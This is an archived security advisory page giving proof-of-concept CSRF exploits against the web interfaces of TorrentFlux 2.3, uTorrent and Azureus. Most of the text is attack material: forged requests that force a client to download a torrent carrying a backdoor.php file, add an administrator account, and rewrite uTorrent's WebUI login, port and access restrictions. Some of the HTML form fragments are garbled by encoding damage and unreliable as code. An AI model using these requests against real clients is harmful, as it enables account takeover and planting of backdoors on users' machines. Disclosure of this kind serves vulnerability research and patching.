AOH :: HP Unsorted B :: BX2867.HTM

BitTorrent Clients and CSRF



BitTorrent Clients and CSRF
BitTorrent Clients and CSRF



The following are proof of concept exploits against three bittorrent clients.  uTorrent' WebUI, Azurues's "HTML WebUI", and TorrentFlux.

More information:
http://www.rooksecurity.com/blog/?p=10

TorrentFlux v2.3(Latest)
http://sourceforge.net/projects/torrentflux/

If you force TorrentFlux to download a torrent that contains a file backdoor.php you will be able to execute it by browsing here:
http://localhost/torrentflux_2.3/html/downloads/USER_NAME/
You do not have to know a password to access this folder, but you will have to know the username.

">action="http://localhost/torrentflux_2.3/html/index.php"> ">value="http://localhost/backdoor.php.torrent"> Add an admistrative account: action==94http://localhost/torrentflux_2.3/html/admin.php?op=addUser=94>
uTorrent=92s WebUI is also affected: http://forum.utorrent.com/viewtopic.php?id=14565 force file download: http://127.0.0.1:8080/gui/?action=add-url&s=http://localhost/backdoor.torrent utorrent change administrative login information: http://127.0.0.1:8080/gui/?action=setsetting&s=webui.username&v=badmin http://127.0.0.1:8080/gui/?action=setsetting&s=webui.password&v=badmin http://127.0.0.1:8080/gui/?action=setsetting&s=webui.port&v=4096 After the username or password have been changed then the browser must re-authenticate. http://127.0.0.1:8080/gui/?action=setsetting&s=webui.restrict&v=127.0.0.1/24,10.1.1.1 So is Azurues=92s HTML WebUI: Force file download: http://127.0.0.1:6886/index.tmpl?d=u&upurl=http://localhost/backdoor.torrent

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.